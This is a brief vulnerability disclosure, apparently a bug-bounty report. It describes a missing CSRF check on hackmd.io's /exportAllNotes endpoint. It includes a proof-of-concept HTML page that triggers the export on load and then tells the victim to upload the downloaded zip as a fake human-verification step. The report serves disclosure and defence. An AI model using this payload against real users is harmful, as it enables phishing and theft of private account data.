/exportAllNotes endpoint does not require any CSRF token validation. This could be used to force download account data and potentially spoof users.
<html> <body onload='window.open("https://hackmd.io/exportAllNotes");'> To verify that you are a human, upload the zip file that has been downloaded from our website now. </body> </html>
Potential private information leakage through phishing by exploiting missing CSRF token.